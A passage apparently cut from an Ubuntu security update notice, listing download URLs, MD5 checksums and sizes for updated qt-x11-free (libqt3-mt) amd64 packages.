03922254eb6924bd67952f0e14f8f34d http://security.ubuntu.com/ubuntu/pool/universe/q/qt-x11-free/libqt3-mt-dbg_3.3.4-8ubuntu5.2_amd64.deb Size/MD5: 17426488 2ce5310a6ba010544a9b813b78dee1ec http://security.ubuntu.com/ubuntu/pool/main/q/qt-x11-free/libqt3-mt-dev_3.3.4-8ubuntu5.2_amd64.deb Size/MD5:51442 626662816df2adc35559f4308f921e6e http://security.ubuntu.com/ubuntu/pool/universe/q/qt-x11-free/libqt3-mt-mysql_3.3.4-8ubuntu5.2_amd64.deb Size/MD5:56118 bb231492bf303b1c18e340f185b2f136 http://security.ubuntu.com/ubuntu/pool/universe/q/qt-x11-free/libqt3-mt-odbc_3.3.4-8ubuntu5.2_amd64.deb Size/MD5:78240
